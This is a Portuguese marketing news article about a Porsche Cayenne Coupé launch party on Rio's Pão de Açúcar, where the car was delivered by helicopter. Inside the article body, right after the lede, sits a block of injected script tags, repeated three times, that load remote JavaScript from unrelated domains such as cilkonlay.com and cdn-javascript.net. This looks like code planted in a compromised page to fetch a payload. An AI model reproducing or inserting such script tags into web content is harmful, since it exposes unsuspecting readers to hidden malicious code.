Experiência de Marca

Porsche chega de helicóptero a evento no Rio de Janeiro

A ação de live marketing inovadora levou o carro pelos céus da Cidade Maravilhosa até o ponto mais alto do Pão de Açúcar para uma festa de lançamento do novo modelo. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script><script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script><script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573698496207" type="text/javascript"></script><script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script><script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script><script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script><script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573699069609" type="text/javascript"></script><script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script><script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script><script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script><script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573699132390" type="text/javascript"></script><script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

A ação de live marketing inovadora levou o carro pelos céus da Cidade Maravilhosa até o ponto mais alto do Pão de Açúcar para uma festa de lançamento do novo modelo.

No último final de semana, a Agência at2d, realizou para a Porsche o lançamento para consumidores da marca no Rio de Janeiro, no alto do Morro do Pão de Açúcar, em uma operação totalmente inovadora, onde o novo Cayenne Coupé chegou de helicóptero durante a semana para o momento da revelação ao público presente.

As últimas novidades do mercado de live marketing estão aqui.

A festa exclusiva para menos de 200 convidados que aconteceu no dia 09 de novembro, contou com a presença de 3 Djs, RNLD, Tricy acompanhada da violinista Catarina Rossi e Johnnie Pinton. A violinista, inclusive, realizou uma performance artística durante a revelação do carro que estava no mirante do Pão de Açúcar.

A festa foi produzida pela agência com o apoio da Omni Táxi Aéreo para o transporte do carro até o Pão de Açúcar, do grupo do Bondinho do Pão de Açúcar para o transporte VIP dos convidados, da Duas Gastronomia responsável pelo A&B e também do Abdala Brothers para a captação de imagens. Além de outros tantos envolvidos para um evento gigantesco com essa logística incrível.

Confira os filmes da ação de live marketing aqui e aqui.